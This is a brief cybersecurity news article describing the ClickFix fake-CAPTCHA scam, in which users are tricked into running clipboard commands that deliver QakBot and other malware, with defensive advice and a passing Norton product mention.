Image by DC Studio, from Freepik
Fake Captcha Scam: How Hackers Trick Users into Downloading Malware
Reading time: 2 min
Updated on Mar 31, 2025
-
![Kiara Fabbri]()
-
![Sarah Frazier]()
Fact-Checked by Sarah Frazier Content Manager
ClickFix Captcha presents itself as an innocuous verification test but cybercriminals use this tactic to distribute malware to unsuspecting users.
In a rush? Here are the quick facts:
- Hackers use ClickFix Captcha to trick users into executing malware commands.
- QakBot trojan is being delivered through fake captchas and hidden PowerShell scripts.
- Attackers use XOR decryption to hide malicious code and evade detection.
The malware distribution method has been associated with ransomware delivery and the spread of QakBot banking trojan, and infostealers. Since its initial discovery in 2008, the researchers say that QakBot has evolved into a sophisticated piece of malware.
The security researchers at DarkAtlas Research Squad discovered a new attack that tricked users into thinking they were doing standard captcha work. Users were unknowingly running commands on their own computers without their knowledge.
The ClickFix Captcha directed users to activate Windows Key + R which automatically triggered a preloaded command stored in their clipboard. The command secretly downloaded an encrypted file from a remote server while executing malicious code without triggering any suspicion.
DarkAtlas also revealed that the malware used XOR decryption to hide its real purpose, making detection particularly difficult. The attackers created fake domains to host ZIP files containing malicious payloads.
Once downloaded, these files extracted and executed harmful scripts designed to steal sensitive information or deploy ransomware. Worryingly, the hackers could generate an unlimited number of unique URLs to distribute their malware, making it nearly impossible for security systems to blacklist them effectively.
This attack is in line with Q3/2024 report from Gen shows a dramatic increase in “Scam-Yourself Attacks” which deceive users into installing malware. The attackers use ClickFix scams together with fake CAPTCHA prompts and deceptive tutorials to gain control.
According to the report, AI and deepfake technology have made scams more difficult to detect. Users can stay protected from evolving threats with the help of Norton Genie.
The researchers advise that users should remain vigilant and avoid executing unexpected commands from unknown websites.
Previous Story
Latest articles 
Leave a Comment
Cancel